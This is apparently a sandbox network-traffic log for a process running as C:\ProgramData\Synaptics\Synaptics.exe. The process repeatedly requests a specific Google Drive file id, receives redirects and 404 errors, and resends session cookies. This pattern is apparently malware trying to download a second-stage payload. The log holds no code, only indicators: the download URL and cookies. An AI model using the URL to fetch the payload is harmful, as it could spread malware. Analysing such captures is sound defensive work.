                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:05 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-K7WbdvSNYF-OWqU5pOrrvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49710 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:05 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:05 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:05 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-y1_iuoLVJJFohtHV8ts_tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49714 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:06 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:06 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Csj1iQdV5HhLxFWhs5nSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49716 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:06 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
2024-12-30 10:23:06 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5LW8KWFdf7WMzgVOKWjf4IF7bNdIVOTWuexsLEbEaKfG80j5InKOJtoOk2-WuWZ0K5Drig-y8
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:06 GMT
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EVdNpbwuN1QWJcBMFv02Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Set-Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-; expires=Tue, 01-Jul-2025 10:23:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:06 UTC | 1602 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2EfXly6hCEn1Pthwq5yd8Q">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:23:06 UTC | 50 | IN | Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
Data Ascii: is server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49718 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:06 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:06 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce--6KTBPOCbcaTqpJuWr_cIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      5 | 192.168.2.5 | 49717 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:06 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-12-30 10:23:06 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5cqaWD6d3q0rH-Yt_a05ogvdWVub7xbkK1pfZGrJjOX76v1U7RxU25f4gUBPtk0hbk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:06 GMT
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-utEZa2iZsmkq8k0AkcQ0kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Set-Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4; expires=Tue, 01-Jul-2025 10:23:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:06 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="buambxl8LSOTJUDO-EQVlQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                      2024-12-30 10:23:06 UTC | 57 | IN | Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      6 | 192.168.2.5 | 49720 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:07 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:07 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:07 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RvEsiuMkGnHmgvtk4LG0XQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      7 | 192.168.2.5 | 49721 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:07 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-12-30 10:23:07 UTC | 1602 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4MUBlZl7tlL72SC1mwTP1RtQhE6wrODIp8x7IMwH872yfWmZjz1P-0a7bsgijVze9_q8Zv1jM
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:07 GMT
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LmRmpc2s4cIEWb7eFbGWWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Set-Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB; expires=Tue, 01-Jul-2025 10:23:07 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:07 UTC | 1602 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1BAVNnuVDN68_qc7k8XO8g">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                      2024-12-30 10:23:07 UTC | 50 | IN | Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      8 | 192.168.2.5 | 49723 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:07 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-
                                                                                                                                      2024-12-30 10:23:08 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7rjjA8IbwYU2n2lgHjwstck9YCiEedBvToUDa3C3XjDvhH8Pq7ujbkFvaUhAX_GDBz3nZREfk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:07 GMT
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SSobHbL1VTkE-3_IYqw00A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:08 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:08 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="cdGkdnWQ28Z09hhrOn-lsg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:08 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      9 | 192.168.2.5 | 49722 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:07 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:07 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:07 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-e6ATtPYALh-K5QZcqYzU3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49726 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:08 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49727 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:08 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49728 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:08 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
